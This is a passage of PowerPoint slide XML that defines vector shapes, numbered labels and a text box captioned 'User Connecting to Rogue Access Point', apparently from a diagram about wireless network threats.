              <a:ext cx="845312" cy="843003"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1613 w 1614"/>
                <a:gd name="T1" fmla="*/ 1607 h 1608"/>
                <a:gd name="T2" fmla="*/ 1613 w 1614"/>
                <a:gd name="T3" fmla="*/ 1607 h 1608"/>
                <a:gd name="T4" fmla="*/ 0 w 1614"/>
                <a:gd name="T5" fmla="*/ 1607 h 1608"/>
                <a:gd name="T6" fmla="*/ 1613 w 1614"/>
                <a:gd name="T7" fmla="*/ 0 h 1608"/>
                <a:gd name="T8" fmla="*/ 1613 w 1614"/>
                <a:gd name="T9" fmla="*/ 1607 h 1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4" h="1608">
                  <a:moveTo>
                    <a:pt x="1613" y="1607"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1613" y="1607"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1607"/>
                    <a:pt x="0" y="1607"/>
                    <a:pt x="0" y="1607"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="715"/>
                    <a:pt x="720" y="0"/>
                    <a:pt x="1613" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1613" y="1607"/>
                  </a:ln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defTabSz="914217"/>
              <a:endParaRPr lang="en-US" sz="359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9B19151-308F-44C6-8D4F-88BAC940F632}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8308372" y="1238250"/>
              <a:ext cx="405881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217"/>
              <a:r>
                <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Lato" charset="0"/>
                  <a:ea typeface="Lato" charset="0"/>
                  <a:cs typeface="Lato" charset="0"/>
                </a:rPr>
                <a:t>3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Shape 2546">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9417F019-B0AB-417C-87FC-ACDABFD7A95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827438" y="2312602"/>
              <a:ext cx="313039" cy="2561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618" y="20400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="18655" y="20400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18655" y="1200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20618" y="1200"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20618" y="1200"/>
                    <a:pt x="20618" y="20400"/>
                    <a:pt x="20618" y="20400"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="21109" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="18164" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17893" y="0"/>
                    <a:pt x="17673" y="269"/>
                    <a:pt x="17673" y="600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="17673" y="21000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17673" y="21332"/>
                    <a:pt x="17893" y="21600"/>
                    <a:pt x="18164" y="21600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21109" y="21600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="21380" y="21600"/>
                    <a:pt x="21600" y="21332"/>
                    <a:pt x="21600" y="21000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21600" y="600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="21600" y="269"/>
                    <a:pt x="21380" y="0"/>
                    <a:pt x="21109" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="8836" y="20400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6873" y="20400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6873" y="3600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8836" y="3600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8836" y="3600"/>
                    <a:pt x="8836" y="20400"/>
                    <a:pt x="8836" y="20400"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="9327" y="2400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6382" y="2400"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6111" y="2400"/>
                    <a:pt x="5891" y="2669"/>
                    <a:pt x="5891" y="3000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5891" y="21000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5891" y="21332"/>
                    <a:pt x="6111" y="21600"/>
                    <a:pt x="6382" y="21600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9327" y="21600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9598" y="21600"/>
                    <a:pt x="9818" y="21332"/>
                    <a:pt x="9818" y="21000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9818" y="3000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9818" y="2669"/>
                    <a:pt x="9598" y="2400"/>
                    <a:pt x="9327" y="2400"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="14727" y="20400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12764" y="20400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12764" y="10800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14727" y="10800"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="14727" y="10800"/>
                    <a:pt x="14727" y="20400"/>
                    <a:pt x="14727" y="20400"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="15218" y="9600"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12273" y="9600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12002" y="9600"/>
                    <a:pt x="11782" y="9869"/>
                    <a:pt x="11782" y="10200"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11782" y="21000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11782" y="21332"/>
                    <a:pt x="12002" y="21600"/>
                    <a:pt x="12273" y="21600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="15218" y="21600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15489" y="21600"/>
                    <a:pt x="15709" y="21332"/>
                    <a:pt x="15709" y="21000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="15709" y="10200"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15709" y="9869"/>
                    <a:pt x="15489" y="9600"/>
                    <a:pt x="15218" y="9600"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2945" y="20400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="982" y="20400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="982" y="14400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2945" y="14400"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2945" y="14400"/>
                    <a:pt x="2945" y="20400"/>
                    <a:pt x="2945" y="20400"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3436" y="13200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="491" y="13200"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="13200"/>
                    <a:pt x="0" y="13469"/>
                    <a:pt x="0" y="13800"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="21000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="21332"/>
                    <a:pt x="220" y="21600"/>
                    <a:pt x="491" y="21600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3436" y="21600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3707" y="21600"/>
                    <a:pt x="3927" y="21332"/>
                    <a:pt x="3927" y="21000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3927" y="13800"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3927" y="13469"/>
                    <a:pt x="3707" y="13200"/>
                    <a:pt x="3436" y="13200"/>
                  </a:cubicBezTo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19045" tIns="19045" rIns="19045" bIns="19045" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="228532">
                <a:defRPr sz="3000" cap="none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 dirty="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Lato Light" charset="0"/>
                <a:ea typeface="Lato Light" charset="0"/>
                <a:cs typeface="Lato Light" charset="0"/>
                <a:sym typeface="Gill Sans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304439" y="1021080"/>
            <a:ext cx="3657961" cy="1878557"/>
            <a:chOff x="866304" y="1157414"/>
            <a:chExt cx="3152597" cy="1619026"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Freeform 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E773ADA3-61D2-44E7-A15A-97AB295FDCF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47139" y="1238250"/>
              <a:ext cx="2965519" cy="1455046"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 5660"/>
                <a:gd name="T1" fmla="*/ 0 h 2777"/>
                <a:gd name="T2" fmla="*/ 0 w 5660"/>
                <a:gd name="T3" fmla="*/ 0 h 2777"/>
                <a:gd name="T4" fmla="*/ 4271 w 5660"/>
                <a:gd name="T5" fmla="*/ 0 h 2777"/>
                <a:gd name="T6" fmla="*/ 5659 w 5660"/>
                <a:gd name="T7" fmla="*/ 1389 h 2777"/>
                <a:gd name="T8" fmla="*/ 5659 w 5660"/>
                <a:gd name="T9" fmla="*/ 2776 h 2777"/>
                <a:gd name="T10" fmla="*/ 1388 w 5660"/>
                <a:gd name="T11" fmla="*/ 2776 h 2777"/>
                <a:gd name="T12" fmla="*/ 0 w 5660"/>
                <a:gd name="T13" fmla="*/ 1389 h 2777"/>
                <a:gd name="T14" fmla="*/ 0 w 5660"/>
                <a:gd name="T15" fmla="*/ 0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60" h="2777">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4271" y="0"/>
                    <a:pt x="4271" y="0"/>
                    <a:pt x="4271" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5033" y="0"/>
                    <a:pt x="5659" y="627"/>
                    <a:pt x="5659" y="1389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5659" y="2776"/>
                    <a:pt x="5659" y="2776"/>
                    <a:pt x="5659" y="2776"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1388" y="2776"/>
                    <a:pt x="1388" y="2776"/>
                    <a:pt x="1388" y="2776"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="621" y="2776"/>
                    <a:pt x="0" y="2151"/>
                    <a:pt x="0" y="1389"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0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ffectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="914217"/>
              <a:endParaRPr lang="en-US" sz="359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" name="Freeform 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3AD84A1-36B5-4AD1-BDCF-57E0CAF8D2F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66304" y="1157414"/>
              <a:ext cx="843003" cy="845312"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1608"/>
                <a:gd name="T1" fmla="*/ 0 h 1614"/>
                <a:gd name="T2" fmla="*/ 0 w 1608"/>
                <a:gd name="T3" fmla="*/ 0 h 1614"/>
                <a:gd name="T4" fmla="*/ 1607 w 1608"/>
                <a:gd name="T5" fmla="*/ 0 h 1614"/>
                <a:gd name="T6" fmla="*/ 0 w 1608"/>
                <a:gd name="T7" fmla="*/ 1613 h 1614"/>
                <a:gd name="T8" fmla="*/ 0 w 1608"/>
                <a:gd name="T9" fmla="*/ 0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8" h="1614">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1607" y="0"/>
                    <a:pt x="1607" y="0"/>
                    <a:pt x="1607" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1607" y="892"/>
                    <a:pt x="887" y="1613"/>
                    <a:pt x="0" y="1613"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:ln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algn="ctr" defTabSz="914217"/>
              <a:endParaRPr lang="en-US" sz="3599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" name="Freeform 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{961C72B1-8B8E-4E2A-A5DC-CC3C86FDCE9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173589" y="1933437"/>
              <a:ext cx="845312" cy="843003"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1613 w 1614"/>
                <a:gd name="T1" fmla="*/ 1607 h 1608"/>
                <a:gd name="T2" fmla="*/ 1613 w 1614"/>
                <a:gd name="T3" fmla="*/ 1607 h 1608"/>
                <a:gd name="T4" fmla="*/ 0 w 1614"/>
                <a:gd name="T5" fmla="*/ 1607 h 1608"/>
                <a:gd name="T6" fmla="*/ 1613 w 1614"/>
                <a:gd name="T7" fmla="*/ 0 h 1608"/>
                <a:gd name="T8" fmla="*/ 1613 w 1614"/>
                <a:gd name="T9" fmla="*/ 1607 h 1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4" h="1608">
                  <a:moveTo>
                    <a:pt x="1613" y="1607"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1613" y="1607"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1607"/>
                    <a:pt x="0" y="1607"/>
                    <a:pt x="0" y="1607"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="715"/>
                    <a:pt x="720" y="0"/>
                    <a:pt x="1613" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1613" y="1607"/>
                  </a:ln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defTabSz="914217"/>
              <a:endParaRPr lang="en-US" sz="359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06DB51A1-FF53-48DF-B64C-EE6C3D73E9F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="990881" y="1238250"/>
              <a:ext cx="405881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217"/>
              <a:r>
                <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Lato" charset="0"/>
                  <a:ea typeface="Lato" charset="0"/>
                  <a:cs typeface="Lato" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Freeform 125">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF5480BB-2D68-4EEC-890B-2F4E549A297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498856" y="2276598"/>
              <a:ext cx="328128" cy="328130"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 195663 w 587"/>
                <a:gd name="T1" fmla="*/ 73611 h 588"/>
                <a:gd name="T2" fmla="*/ 195663 w 587"/>
                <a:gd name="T3" fmla="*/ 73611 h 588"/>
                <a:gd name="T4" fmla="*/ 167608 w 587"/>
                <a:gd name="T5" fmla="*/ 101619 h 588"/>
                <a:gd name="T6" fmla="*/ 129483 w 587"/>
                <a:gd name="T7" fmla="*/ 111673 h 588"/>
                <a:gd name="T8" fmla="*/ 152502 w 587"/>
                <a:gd name="T9" fmla="*/ 86538 h 588"/>
                <a:gd name="T10" fmla="*/ 155020 w 587"/>
                <a:gd name="T11" fmla="*/ 86538 h 588"/>
                <a:gd name="T12" fmla="*/ 183074 w 587"/>
                <a:gd name="T13" fmla="*/ 58530 h 588"/>
                <a:gd name="T14" fmla="*/ 183074 w 587"/>
                <a:gd name="T15" fmla="*/ 30522 h 588"/>
                <a:gd name="T16" fmla="*/ 155020 w 587"/>
                <a:gd name="T17" fmla="*/ 30522 h 588"/>
                <a:gd name="T18" fmla="*/ 124447 w 587"/>
                <a:gd name="T19" fmla="*/ 58530 h 588"/>
                <a:gd name="T20" fmla="*/ 124447 w 587"/>
                <a:gd name="T21" fmla="*/ 58530 h 588"/>
                <a:gd name="T22" fmla="*/ 124447 w 587"/>
                <a:gd name="T23" fmla="*/ 58530 h 588"/>
                <a:gd name="T24" fmla="*/ 101788 w 587"/>
                <a:gd name="T25" fmla="*/ 84024 h 588"/>
                <a:gd name="T26" fmla="*/ 111859 w 587"/>
                <a:gd name="T27" fmla="*/ 43448 h 588"/>
                <a:gd name="T28" fmla="*/ 139554 w 587"/>
                <a:gd name="T29" fmla="*/ 15440 h 588"/>
                <a:gd name="T30" fmla="*/ 195663 w 587"/>
                <a:gd name="T31" fmla="*/ 15440 h 588"/>
                <a:gd name="T32" fmla="*/ 195663 w 587"/>
                <a:gd name="T33" fmla="*/ 73611 h 588"/>
                <a:gd name="T34" fmla="*/ 81286 w 587"/>
                <a:gd name="T35" fmla="*/ 147222 h 588"/>
                <a:gd name="T36" fmla="*/ 81286 w 587"/>
                <a:gd name="T37" fmla="*/ 147222 h 588"/>
                <a:gd name="T38" fmla="*/ 81286 w 587"/>
                <a:gd name="T39" fmla="*/ 147222 h 588"/>
                <a:gd name="T40" fmla="*/ 73733 w 587"/>
                <a:gd name="T41" fmla="*/ 149736 h 588"/>
                <a:gd name="T42" fmla="*/ 63303 w 587"/>
                <a:gd name="T43" fmla="*/ 139681 h 588"/>
                <a:gd name="T44" fmla="*/ 65820 w 587"/>
                <a:gd name="T45" fmla="*/ 132141 h 588"/>
                <a:gd name="T46" fmla="*/ 132001 w 587"/>
                <a:gd name="T47" fmla="*/ 66070 h 588"/>
                <a:gd name="T48" fmla="*/ 139554 w 587"/>
                <a:gd name="T49" fmla="*/ 61043 h 588"/>
                <a:gd name="T50" fmla="*/ 149984 w 587"/>
                <a:gd name="T51" fmla="*/ 71097 h 588"/>
                <a:gd name="T52" fmla="*/ 147467 w 587"/>
                <a:gd name="T53" fmla="*/ 78638 h 588"/>
                <a:gd name="T54" fmla="*/ 147467 w 587"/>
                <a:gd name="T55" fmla="*/ 78638 h 588"/>
                <a:gd name="T56" fmla="*/ 81286 w 587"/>
                <a:gd name="T57" fmla="*/ 147222 h 588"/>
                <a:gd name="T58" fmla="*/ 58267 w 587"/>
                <a:gd name="T59" fmla="*/ 124600 h 588"/>
                <a:gd name="T60" fmla="*/ 58267 w 587"/>
                <a:gd name="T61" fmla="*/ 124600 h 588"/>
                <a:gd name="T62" fmla="*/ 30572 w 587"/>
                <a:gd name="T63" fmla="*/ 152249 h 588"/>
                <a:gd name="T64" fmla="*/ 30572 w 587"/>
                <a:gd name="T65" fmla="*/ 180257 h 588"/>
                <a:gd name="T66" fmla="*/ 58267 w 587"/>
                <a:gd name="T67" fmla="*/ 180257 h 588"/>
                <a:gd name="T68" fmla="*/ 86322 w 587"/>
                <a:gd name="T69" fmla="*/ 152249 h 588"/>
                <a:gd name="T70" fmla="*/ 88840 w 587"/>
                <a:gd name="T71" fmla="*/ 152249 h 588"/>
                <a:gd name="T72" fmla="*/ 111859 w 587"/>
                <a:gd name="T73" fmla="*/ 129627 h 588"/>
                <a:gd name="T74" fmla="*/ 101788 w 587"/>
                <a:gd name="T75" fmla="*/ 167690 h 588"/>
                <a:gd name="T76" fmla="*/ 73733 w 587"/>
                <a:gd name="T77" fmla="*/ 195698 h 588"/>
                <a:gd name="T78" fmla="*/ 17624 w 587"/>
                <a:gd name="T79" fmla="*/ 195698 h 588"/>
                <a:gd name="T80" fmla="*/ 17624 w 587"/>
                <a:gd name="T81" fmla="*/ 139681 h 588"/>
                <a:gd name="T82" fmla="*/ 45679 w 587"/>
                <a:gd name="T83" fmla="*/ 111673 h 588"/>
                <a:gd name="T84" fmla="*/ 83804 w 587"/>
                <a:gd name="T85" fmla="*/ 99106 h 588"/>
                <a:gd name="T86" fmla="*/ 58267 w 587"/>
                <a:gd name="T87" fmla="*/ 124600 h 58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87" h="588">
                  <a:moveTo>
                    <a:pt x="544" y="205"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="544" y="205"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="466" y="283"/>
                    <a:pt x="466" y="283"/>
                    <a:pt x="466" y="283"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="438" y="311"/>
                    <a:pt x="396" y="319"/>
                    <a:pt x="360" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="424" y="241"/>
                    <a:pt x="424" y="241"/>
                    <a:pt x="424" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="424" y="241"/>
                    <a:pt x="424" y="241"/>
                    <a:pt x="431" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="509" y="163"/>
                    <a:pt x="509" y="163"/>
                    <a:pt x="509" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="530" y="142"/>
                    <a:pt x="530" y="106"/>
                    <a:pt x="509" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="64"/>
                    <a:pt x="452" y="64"/>
                    <a:pt x="431" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="163"/>
                    <a:pt x="346" y="163"/>
                    <a:pt x="346" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="234"/>
                    <a:pt x="283" y="234"/>
                    <a:pt x="283" y="234"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268" y="191"/>
                    <a:pt x="283" y="149"/>
                    <a:pt x="311" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="43"/>
                    <a:pt x="388" y="43"/>
                    <a:pt x="388" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="431" y="0"/>
                    <a:pt x="501" y="0"/>
                    <a:pt x="544" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="586" y="85"/>
                    <a:pt x="586" y="156"/>
                    <a:pt x="544" y="205"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="226" y="410"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="226" y="410"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="219" y="417"/>
                    <a:pt x="212" y="417"/>
                    <a:pt x="205" y="417"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="417"/>
                    <a:pt x="176" y="403"/>
                    <a:pt x="176" y="389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="382"/>
                    <a:pt x="176" y="375"/>
                    <a:pt x="183" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="367" y="184"/>
                    <a:pt x="367" y="184"/>
                    <a:pt x="367" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="177"/>
                    <a:pt x="381" y="170"/>
                    <a:pt x="388" y="170"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="170"/>
                    <a:pt x="417" y="184"/>
                    <a:pt x="417" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="205"/>
                    <a:pt x="417" y="212"/>
                    <a:pt x="410" y="219"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="226" y="410"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="162" y="347"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="162" y="347"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="424"/>
                    <a:pt x="85" y="424"/>
                    <a:pt x="85" y="424"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="446"/>
                    <a:pt x="63" y="481"/>
                    <a:pt x="85" y="502"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="530"/>
                    <a:pt x="141" y="530"/>
                    <a:pt x="162" y="502"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="424"/>
                    <a:pt x="240" y="424"/>
                    <a:pt x="240" y="424"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="247" y="424"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="311" y="361"/>
                    <a:pt x="311" y="361"/>
                    <a:pt x="311" y="361"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="318" y="396"/>
                    <a:pt x="311" y="439"/>
                    <a:pt x="283" y="467"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="545"/>
                    <a:pt x="205" y="545"/>
                    <a:pt x="205" y="545"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="587"/>
                    <a:pt x="92" y="587"/>
                    <a:pt x="49" y="545"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="502"/>
                    <a:pt x="0" y="432"/>
                    <a:pt x="49" y="389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="311"/>
                    <a:pt x="127" y="311"/>
                    <a:pt x="127" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="276"/>
                    <a:pt x="198" y="269"/>
                    <a:pt x="233" y="276"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="347"/>
                    <a:pt x="162" y="347"/>
                    <a:pt x="162" y="34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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1580" name="Group 1579">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{394E450A-1AE0-4221-8E0E-2FB09321C2DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="213376" y="3035971"/>
            <a:ext cx="11765248" cy="3669629"/>
            <a:chOff x="344548" y="1066800"/>
            <a:chExt cx="11765248" cy="3669629"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1581" name="Text Box 914">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F18C8C18-96FB-4A60-92C3-6C3925EF8E0D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1270892" y="1643701"/>
              <a:ext cx="1370501" cy="610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Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>  User Connecting  </a:t>
              </a:r>
              <a:br>
                <a:rPr kumimoji="0" lang="en-US" sz="1050" b="1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Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1050" b="1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Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>    to Rogue Access </a:t>
              </a:r>
              <a:br>
                <a:rPr kumimoji="0" lang="en-US" sz="1050" b="1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Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1050" b="1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Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>                          Point</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
